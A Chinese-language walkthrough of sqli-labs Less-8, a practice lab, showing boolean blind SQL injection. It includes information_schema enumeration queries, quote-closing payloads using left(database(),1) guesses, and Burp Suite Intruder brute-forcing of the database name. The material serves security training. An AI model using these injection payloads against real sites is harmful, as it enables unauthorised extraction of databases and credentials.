less-8
sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。
学习sqli注入必备语句:
查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例)
查字段:select column_name from information_schema.columns where table_name=‘users’(此处拿users表例)
查字段的值:select username,password from security.users(此处拿username,password字段为例)
1.用引号试探看出,此处是用单引号包裹的,使用单引号注入
2.使用- -+闭合,回显恢复
3.在前面我们看到没有任何报错信息,这里我们可以使用left语句进行盲注
id=1' and left((database()),1)='e'--+
left语句:left((构造语句),1)=‘s’
当第一位为e时,没有返回结果,说明database中的第一位不是字母e
4.继续判断
id=1' and left((database()),1)='s'--+
当第一位为s时,返回You are in…,说明database中的第一位是字母s
5.下面我们配合Burp Suite软件可以提升速度
(1)将拦截的包发送
(2)选择Positions模块,清除标记,然后给m(第一位取随机字母)加上标记
(3)再选择Paylods模块,选择Brute forcer模式,长度改为1
(4)开始
(5)可以看到s的Length与其他不同,得出s是database的第一位字母